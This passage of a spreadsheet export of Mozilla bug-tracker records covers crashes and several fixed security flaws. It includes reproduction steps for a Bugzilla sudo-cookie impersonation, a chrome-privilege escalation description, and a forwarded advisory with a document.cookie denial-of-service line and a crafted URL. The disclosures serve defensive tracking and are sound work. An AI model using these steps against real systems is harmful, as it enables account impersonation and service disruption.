        <v>1</v>
      </c>
    </row>
    <row r="702">
      <c r="A702" t="n">
        <v>401628</v>
      </c>
      <c r="B702" t="inlineStr">
        <is>
          <t>2007-10-29 14:54:22 -0700</t>
        </is>
      </c>
      <c r="C702" t="inlineStr">
        <is>
          <t>purge production ssh keys from staging trunk automation setup</t>
        </is>
      </c>
      <c r="D702" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E702" t="n">
        <v>1</v>
      </c>
      <c r="F702" t="n">
        <v>1</v>
      </c>
      <c r="G702" t="n">
        <v>5</v>
      </c>
      <c r="H702" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I702" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J702" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K702" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L702" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M702" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N702" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O702" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P702" t="inlineStr"/>
      <c r="Q702" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R702" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S702" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T702" t="n">
        <v>1</v>
      </c>
      <c r="U702" t="n">
        <v>0</v>
      </c>
      <c r="V702" t="n">
        <v>3</v>
      </c>
      <c r="W702" t="inlineStr">
        <is>
          <t>Nick reminded me today that the staging automation setup shouldn't have the production ssh keys on it. Will remove these.</t>
        </is>
      </c>
      <c r="X702" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="703">
      <c r="A703" t="n">
        <v>450013</v>
      </c>
      <c r="B703" t="inlineStr">
        <is>
          <t>2008-08-10 05:29:46 -0700</t>
        </is>
      </c>
      <c r="C703" t="inlineStr">
        <is>
          <t>[SECURITY] Can sudo a user without sending email</t>
        </is>
      </c>
      <c r="D703" t="inlineStr">
        <is>
          <t>2010-12-23 14:42:09 -0800</t>
        </is>
      </c>
      <c r="E703" t="n">
        <v>1</v>
      </c>
      <c r="F703" t="n">
        <v>1</v>
      </c>
      <c r="G703" t="n">
        <v>4</v>
      </c>
      <c r="H703" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I703" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J703" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K703" t="inlineStr">
        <is>
          <t>2.22</t>
        </is>
      </c>
      <c r="L703" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M703" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N703" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O703" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P703" t="inlineStr">
        <is>
          <t>[infrasec:access]</t>
        </is>
      </c>
      <c r="Q703" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R703" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S703" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T703" t="n">
        <v>1</v>
      </c>
      <c r="U703" t="n">
        <v>0</v>
      </c>
      <c r="V703" t="n">
        <v>19</v>
      </c>
      <c r="W703" t="inlineStr">
        <is>
          <t>The cookie for sudo is the userid.
1. Find out user's id (some queries with debug=1 will expose this)
2. Add cookie 'sudo=&lt;id&gt;'
3. Visit bugzilla site
Actual:
Have sudoed user
Expected:
Fails.
This needs to use a cookie from the token table (that verifies the (originaluser, targetuser) tuple, or something similar. You need to have privileges to sudo, so its not a permissions exploit, but its still not good.....</t>
        </is>
      </c>
      <c r="X703" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="704">
      <c r="A704" t="n">
        <v>813906</v>
      </c>
      <c r="B704" t="inlineStr">
        <is>
          <t>2012-11-21 02:13:44 -0800</t>
        </is>
      </c>
      <c r="C704" t="inlineStr">
        <is>
          <t>Content can access chrome-privileged pages using plugin objects</t>
        </is>
      </c>
      <c r="D704" t="inlineStr">
        <is>
          <t>2024-05-30 07:52:02 -0700</t>
        </is>
      </c>
      <c r="E704" t="n">
        <v>1</v>
      </c>
      <c r="F704" t="n">
        <v>1</v>
      </c>
      <c r="G704" t="n">
        <v>6</v>
      </c>
      <c r="H704" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I704" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J704" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K704" t="inlineStr">
        <is>
          <t>17 Branch</t>
        </is>
      </c>
      <c r="L704" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M704" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N704" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O704" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P704" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q704" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R704" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S704" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T704" t="n">
        <v>1</v>
      </c>
      <c r="U704" t="n">
        <v>0</v>
      </c>
      <c r="V704" t="n">
        <v>59</v>
      </c>
      <c r="W704" t="inlineStr">
        <is>
          <t>It is possible to open chrome-privileged pages via plugin instances cloned into anonymous content of the SVG "use" element.
The root of the problem lies in the method nsPluginInstanceOwner::GetURL, which may resolve a relative path against a chrome URI and pass it to the OnLinkClick handler method. In theory, such URI should be rejected earlier in nsPluginHost::GetURLWithHeaders, where DoURLLoadSecurityCheck is called, but there's a discrepancy between how nsPluginHost::DoURLLoadSecurityCheck and nsIContent::GetBaseURI derive the baseURI. This inconsistency allows a malicious website to load an arbitrary chrome page in a frame and use it to escalate privileges in drive-by download attacks.</t>
        </is>
      </c>
      <c r="X704" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="705">
      <c r="A705" t="n">
        <v>876044</v>
      </c>
      <c r="B705" t="inlineStr">
        <is>
          <t>2013-05-24 17:08:47 -0700</t>
        </is>
      </c>
      <c r="C705" t="inlineStr">
        <is>
          <t>Domain displayed in cam/mic permission dialog matches URL location bar, not content</t>
        </is>
      </c>
      <c r="D705" t="inlineStr">
        <is>
          <t>2015-01-06 08:40:28 -0800</t>
        </is>
      </c>
      <c r="E705" t="n">
        <v>1</v>
      </c>
      <c r="F705" t="n">
        <v>1</v>
      </c>
      <c r="G705" t="n">
        <v>2</v>
      </c>
      <c r="H705" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I705" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J705" t="inlineStr">
        <is>
          <t>Site Permissions</t>
        </is>
      </c>
      <c r="K705" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N705" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O705" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P705" t="inlineStr">
        <is>
          <t>[getUserMedia][blocking-gum-][adv-main22+]</t>
        </is>
      </c>
      <c r="Q705" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R705" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S705" t="inlineStr">
        <is>
          <t>Firefox 24</t>
        </is>
      </c>
      <c r="T705" t="n">
        <v>1</v>
      </c>
      <c r="U705" t="n">
        <v>0</v>
      </c>
      <c r="V705" t="n">
        <v>54</v>
      </c>
      <c r="W705" t="inlineStr">
        <is>
          <t>Created attachment 754016
Cross-domain iframe
When getUserMedia is called from a cross-domain iframe, the domain displayed in the permission dialog matches the topmost page (displayed in address bar) and not the domain from which the iframe was sourced.
Click on link in first iframe - same domain - permission dialog will display correct domain.
Click on link in second iframe - cross-domain, from people.mozilla.org - permission dialog will display incorrect domain (above).</t>
        </is>
      </c>
      <c r="X705" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="706">
      <c r="A706" t="n">
        <v>1550815</v>
      </c>
      <c r="B706" t="inlineStr">
        <is>
          <t>2019-05-10 11:05:20 -0700</t>
        </is>
      </c>
      <c r="C706" t="inlineStr">
        <is>
          <t>Crash in [@ xtolong]</t>
        </is>
      </c>
      <c r="D706" t="inlineStr">
        <is>
          <t>2019-12-12 13:41:40 -0800</t>
        </is>
      </c>
      <c r="E706" t="n">
        <v>1</v>
      </c>
      <c r="F706" t="n">
        <v>1</v>
      </c>
      <c r="G706" t="n">
        <v>3</v>
      </c>
      <c r="H706" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I706" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J706" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K706" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L706" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M706" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N706" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O706" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P706" t="inlineStr">
        <is>
          <t>[necko-triaged]</t>
        </is>
      </c>
      <c r="Q706" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R706" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S706" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T706" t="n">
        <v>1</v>
      </c>
      <c r="U706" t="n">
        <v>0</v>
      </c>
      <c r="V706" t="n">
        <v>44</v>
      </c>
      <c r="W706" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-c8460119-2b39-41e6-b13f-2e1b20190510.
Seen while looking at release crash stats - there is an older bug on file, Bug 574339 but that seemed to more related to Thunderbird. This has been around before 66, but is become much more visible in the 66 release cycle with over 1200 crashes : https://bit.ly/30c1J9V. It is also flagged as a startup crash.
Also not sure if this is the right component - Core | File Handling is now in the graveyard. 
```
Top 10 frames of crashing thread:
0 libxul.so xtolong modules/libjar/nsZipArchive.cpp:954
1 libxul.so nsZipHandle::findDataStart modules/libjar/nsZipArchive.cpp:282
2 libxul.so nsZipHandle::Init modules/libjar/nsZipArchive.cpp:213
3 libxul.so nsZipArchive::OpenArchive modules/libjar/nsZipArchive.cpp:396
4 libxul.so nsJAR::Open modules/libjar/nsJAR.cpp:96
5 libxul.so NS_InvokeByIndex xpcom/reflect/xptcall/md/unix/xptcinvoke_arm.cpp:167
6 libxul.so XPCWrappedNative::CallMethod js/xpconnect/src/XPCWrappedNative.cpp:1157
7 libxul.so XPC_WN_CallMethod js/xpconnect/src/XPCWrappedNativeJSOps.cpp:943
8 libxul.so js::InternalCallOrConstruct js/src/vm/Interpreter.cpp:535
9 libxul.so JS_CallFunctionValue js/src/jsapi.cpp:2584
```</t>
        </is>
      </c>
      <c r="X706" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="707">
      <c r="A707" t="n">
        <v>858215</v>
      </c>
      <c r="B707" t="inlineStr">
        <is>
          <t>2013-04-04 12:58:03 -0700</t>
        </is>
      </c>
      <c r="C707" t="inlineStr">
        <is>
          <t>document.cookie DOS</t>
        </is>
      </c>
      <c r="D707" t="inlineStr">
        <is>
          <t>2023-04-04 13:26:21 -0700</t>
        </is>
      </c>
      <c r="E707" t="n">
        <v>1</v>
      </c>
      <c r="F707" t="n">
        <v>1</v>
      </c>
      <c r="G707" t="n">
        <v>3</v>
      </c>
      <c r="H707" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I707" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J707" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K707" t="inlineStr">
        <is>
          <t>19 Branch</t>
        </is>
      </c>
      <c r="L707" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M707" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N707" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O707" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P707" t="inlineStr">
        <is>
          <t>[necko-backlog]</t>
        </is>
      </c>
      <c r="Q707" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R707" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S707" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T707" t="n">
        <v>1</v>
      </c>
      <c r="U707" t="n">
        <v>0</v>
      </c>
      <c r="V707" t="n">
        <v>16</v>
      </c>
      <c r="W707" t="inlineStr">
        <is>
          <t>Date: Wed, 3 Apr 2013 09:02:53 -0700
From: Reed Loden &lt;reed@reedloden.com&gt;
To: security@mozilla.org
Subject: Fw: [oss-security] browser document.cookie DoS vulnerability
-----//-----
Is this filed?
Begin forwarded message:
Date: Wed, 3 Apr 2013 17:58:18 +0200
From: Stefan Bühler &lt;stbuehler@lighttpd.net&gt;
To: oss-security@lists.openwall.com
Subject: [oss-security] browser document.cookie DoS vulnerability
Hi,
Chromium 25.0.1364.160 (debian testing), Iceweasel/Firefox 19 and
probably many other browsers allow javascript to set broken cookie
values, leading to possible permanent "400 Bad Request" responses. The
broken value might be set by 3rd party libraries.
For example the google analytics code is vulnerable, as it sets cookie
values based on parameters in the referer query string. lighttpd does
not allow control characters in http header values, so any lighttpd
site using google analytics is vulnerable if you can get the user to
follow a link (img tag for example) to that site like this:
http://www.example.com/?utm_source=test&amp;utm_medium=test&amp;utm_campaign=te%05st
Afaik apache doesn't check the cookie values (or perhaps removes the
broken characters). Imho they are responsible for this mess :)
To be clear: the bug is in the browser / javascript implementation:
document.cookie MUST NOT allow cookie values which include certain
control characters. Javascript applications should not use 8-bit
characters.
(If browser vendors want to allow broken cookie values to be stored,
they MUST NOT send them to the server; in this case javascript
applications can still read the broken values. But I don't think this
is a good idea.)
The safe character set for HTTP header values is: %x20-7E; %x80-FF is
obsoleted by the current draft.
"A recipient MAY replace any linear white space with a single SP before
interpreting the field value", so horizontal tabs are not "safe" - they
might get converted to a space, but are not forbidden (also multiple
spaces can get replaced by a single one).
I think this could use a CVE.
The problem was reported in our lighttpd bug tracker:
http://redmine.lighttpd.net/issues/2188
Kind regards,
Stefan
Testing the bug:
Try one of the listed urls in the ticket (the error should trigger
after a reload). If you have noscript, request policy, referer control
or similar stuff running you are probably safe; to test the bug in this
case you need a Javascript console on a lighttpd site
(http://lighttpd.net for example), and enter:
document.cookie = "foo=bar\x05test"
Try to reload the page - it should return a 400 Bad Request page now.
document.cookie = "foo="
And it should work again.
HTTP references:
http://tools.ietf.org/html/rfc2616
message-header = field-name ":" [ field-value ]
field-name     = token
field-value    = *( field-content | LWS )
field-content  = *TEXT | *(token | separators | quoted-string)
LWS            = [CRLF] 1*( SP | HTAB )
# TEXT is superset of (token | separators | quoted-string)
TEXT = LWS | %x21-7E | %x80-FF
http://tools.ietf.org/html/draft-ietf-httpbis-p1-messaging-22
header-field   = field-name ":" OWS field-value BWS
field-name     = token
field-value    = *( field-content / obs-fold )
field-content  = *( HTAB / SP / VCHAR / obs-text )
obs-fold       = CRLF ( SP / HTAB )
# obsolete text
obs-text = %x80-FF
Basic definitions:
# horizontal tab
HTAB = %x09
# space
SP = %x20
# visible ASCII
VCHAR = %x21-7E
# carriage return + line feed
CRLF = %0x0D %0x0A</t>
        </is>
      </c>
      <c r="X707" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="708">
      <c r="A708" t="n">
        <v>509602</v>
      </c>
      <c r="B708" t="inlineStr">
        <is>
          <t>2009-08-10 16:25:39 -0700</t>
        </is>
      </c>
      <c r="C708" t="inlineStr">
        <is>
          <t>Crash [@ nsTreeBodyFrame::InvalidateScrollbars] with overlay, tree and DOMAttrModified</t>
        </is>
      </c>
      <c r="D708" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E708" t="n">
        <v>1</v>
      </c>
      <c r="F708" t="n">
        <v>1</v>
      </c>
      <c r="G708" t="n">
        <v>3</v>
      </c>
      <c r="H708" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I708" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J708" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K708" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L708" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M708" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N708" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O708" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P708" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q708" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R708" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S708" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T708" t="n">
        <v>1</v>
      </c>
      <c r="U708" t="n">
        <v>0</v>
      </c>
      <c r="V708" t="n">
        <v>26</v>
      </c>
      <c r="W708" t="inlineStr">
        <is>
          <t>Created attachment 393655
zipped up testcase
See zipped up testcase, which crashes in current trunk build. This regressed between 2009-07-29 and 2009-07-30:
http://hg.mozilla.org/mozilla-central/pushloghtml?startdate=2009-07-29+04%3A00%3A00&amp;enddate=2009-07-30+07%3A00%3A00
My guess a regression from bug 486065.
http://crash-stats.mozilla.com/report/index/48bbded9-d50e-4793-a9d4-fb0472090810?p=1
0  	ntdll.dll  	ntdll.dll@0xe514  	
1 	kernel32.dll 	kernel32.dll@0x2541 	
2 	xul.dll 	google_breakpad::ExceptionHandler::WriteMinidumpOnHandlerThread 	toolkit/crashreporter/google-breakpad/src/client/windows/handler/exception_handler.cc:562
3 	xul.dll 	google_breakpad::ExceptionHandler::HandlePureVirtualCall 	toolkit/crashreporter/google-breakpad/src/client/windows/handler/exception_handler.cc:506
4 	mozcrt19.dll 	_purecall 	obj-firefox/memory/jemalloc/crtsrc/purevirt.c:47
5 	xul.dll 	nsCOMPtr&lt;nsIProtocolProxyCallback&gt;::nsCOMPtr&lt;nsIProtocolProxyCallback&gt; 	obj-firefox/dist/include/nsCOMPtr.h:554
6 	xul.dll 	nsTreeBodyFrame::InvalidateScrollbars 	layout/xul/base/src/tree/src/nsTreeBodyFrame.cpp:987
7 	xul.dll 	nsTreeBodyFrame::FullScrollbarsUpdate 	layout/xul/base/src/tree/src/nsTreeBodyFrame.cpp:4717
8 	xul.dll 	nsTreeBodyFrame::SetView 	layout/xul/base/src/tree/src/nsTreeBodyFrame.cpp:546
9 	xul.dll 	nsTreeBoxObject::GetView 	layout/xul/base/src/tree/src/nsTreeBoxObject.cpp:169
10 	xul.dll 	nsTreeBodyFrame::EnsureView 	layout/xul/base/src/tree/src/nsTreeBodyFrame.cpp:393
11 	xul.dll 	nsTreeBodyFrame::ReflowFinished 	layout/xul/base/src/tree/src/nsTreeBodyFrame.cpp:439
12 	xul.dll 	PresShell::HandlePostedReflowCallbacks 	layout/base/nsPresShell.cpp:4769</t>
        </is>
      </c>
      <c r="X708" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="709">
      <c r="A709" t="n">
        <v>713926</v>
      </c>
      <c r="B709" t="inlineStr">
        <is>
          <t>2011-12-28 12:57:39 -0800</t>
        </is>
      </c>
      <c r="C709" t="inlineStr">
        <is>
          <t>[SECURITY] Login form lacks CSRF protection</t>
        </is>
      </c>
      <c r="D709" t="inlineStr">
        <is>
          <t>2017-11-29 11:35:57 -0800</t>
        </is>
      </c>
      <c r="E709" t="n">
        <v>1</v>
      </c>
      <c r="F709" t="n">
        <v>1</v>
      </c>
      <c r="G709" t="n">
        <v>4</v>
      </c>
      <c r="H709" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I709" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J709" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K709" t="inlineStr">
        <is>
          <t>4.0.2</t>
        </is>
      </c>
      <c r="L709" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M709" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N709" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O709" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P709" t="inlineStr">
        <is>
          <t>[wanted-bmo][infrasec:csrf][ws:low]</t>
        </is>
      </c>
      <c r="Q709" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R709" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S709" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T709" t="n">
        <v>1</v>
      </c>
      <c r="U709" t="n">
        <v>0</v>
      </c>
      <c r="V709" t="n">
        <v>44</v>
      </c>
      <c r="W709" t="inlineStr">
        <is>
          <t>Created attachment 584620
patch - v1
[spinning off from bug 471801]
The (CGI-based) login form lacks any type of CSRF protection. This is needed to alleviate the concern specified in section 3 of Adam Barth's CSRF paper (http://seclab.stanford.edu/websec/csrf/csrf.pdf) where an attacker could cause a user to authenticate to Bugzilla using the *attacker's* credentials.
While not optimal, this restricts login form uses to the user's IP plus the time period of MAX_TOKEN_AGE.</t>
        </is>
      </c>
      <c r="X709" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="710">
      <c r="A710" t="n">
        <v>2697</v>
      </c>
      <c r="B710" t="inlineStr">
        <is>
          <t>1999-01-27 05:59:21 -0800</t>
        </is>
      </c>
      <c r="C710" t="inlineStr">
        <is>
          <t>Parser freeze</t>
        </is>
      </c>
      <c r="D710" t="inlineStr">
        <is>
          <t>1999-03-03 17:15:04 -0800</t>
        </is>
      </c>
      <c r="E710" t="n">
        <v>1</v>
      </c>
      <c r="F710" t="n">
        <v>1</v>
      </c>
      <c r="G710" t="n">
        <v>3</v>
      </c>
      <c r="H710" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I710" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J710" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K710" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L710" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M710" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N710" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O710" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P710" t="inlineStr"/>
      <c r="Q710" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R710" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S710" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T710" t="n">
        <v>1</v>
      </c>
      <c r="U710" t="n">
        <v>0</v>
      </c>
      <c r="V710" t="n">
        <v>1</v>
      </c>
      <c r="W710" t="inlineStr">
        <is>
          <t>Program freezes while loading page.</t>
        </is>
      </c>
      <c r="X710" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="711">
      <c r="A711" t="n">
        <v>1540740</v>
      </c>
      <c r="B711" t="inlineStr">
        <is>
          <t>2019-04-01 08:09:14 -0700</t>
        </is>
      </c>
      <c r="C711" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::CheckedInt&lt;T&gt;::value] via MediaData::AdjustForStartTime</t>
        </is>
      </c>
      <c r="D711" t="inlineStr">
        <is>
          <t>2023-01-05 23:01:22 -0800</t>
        </is>
      </c>
      <c r="E711" t="n">
        <v>1</v>
      </c>
      <c r="F711" t="n">
        <v>1</v>
      </c>
      <c r="G711" t="n">
        <v>3</v>
      </c>
      <c r="H711" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I711" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J711" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K711" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L711" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M711" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N711" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O711" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P711" t="inlineStr">
        <is>
          <t>[geckoview:fenix:m4][gvtv:p1][media-q2]</t>
        </is>
      </c>
      <c r="Q711" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R711" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S711" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T711" t="n">
        <v>1</v>
      </c>
      <c r="U711" t="n">
        <v>0</v>
      </c>
      <c r="V711" t="n">
        <v>10</v>
      </c>
      <c r="W711" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-cb656a71-c939-417d-9e2e-1c2ab0190401.
```
Top 10 frames of crashing thread:
0 libxul.so mozilla::CheckedInt&lt;long long&gt;::value const mfbt/CheckedInt.h:535
1 libxul.so mozilla::media::TimeUnit::IsNegative const dom/media/TimeUnits.h:107
2 libxul.so mozilla::MediaData::AdjustForStartTime dom/media/MediaData.h:301
3 libxul.so mozilla::AudioData::AdjustForStartTime dom/media/MediaData.cpp:66
4 libxul.so mozilla::ReaderProxy::OnAudioDataRequestCompleted dom/media/ReaderProxy.cpp:46
5 libxul.so mozilla::MozPromise&lt;RefPtr&lt;mozilla::AudioData&gt;, mozilla::MediaResult, true&gt;::ThenValue&lt;mozilla::ReaderProxy*, RefPtr&lt;mozilla::MozPromise&lt;RefPtr&lt;mozilla::AudioData&gt;, mozilla::MediaResult, true&gt; &gt;  xpcom/threads/MozPromise.h:502
6 libxul.so mozilla::MozPromise&lt;RefPtr&lt;mozilla::AudioData&gt;, mozilla::MediaResult, true&gt;::ThenValueBase::ResolveOrRejectRunnable::Run 
7 libxul.so mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run xpcom/threads/TaskDispatcher.h:197
8 libxul.so mozilla::TaskQueue::Runner::Run xpcom/threads/TaskQueue.cpp:199
9 libxul.so nsThreadPool::Run xpcom/threads/nsThreadPool.cpp:244
```
Alex made integer overflow checks into release asserts, and this is one of the crashes. It is Android-only.</t>
        </is>
      </c>
      <c r="X711" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="712">
      <c r="A712" t="n">
        <v>348514</v>
      </c>
      <c r="B712" t="inlineStr">
        <is>
          <t>2006-08-13 05:30:43 -0700</t>
        </is>
      </c>
      <c r="C712" t="inlineStr">
        <is>
          <t>Crash at http://lcamtuf.coredump.cx/ffoxdie.html (NOT due to too-much-recursion) [@ nsTextFrame::PrepareUnicodeText] [@ nsAutoIndexBuffer::~nsAutoIndexBuffer] (CVE-2006-4253)</t>
        </is>
      </c>
      <c r="D712" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E712" t="n">
        <v>1</v>
      </c>
      <c r="F712" t="n">
        <v>1</v>
      </c>
      <c r="G712" t="n">
        <v>3</v>
      </c>
      <c r="H712" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I712" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J712" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K712" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L712" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M712" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N712" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O712" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P712" t="inlineStr">
        <is>
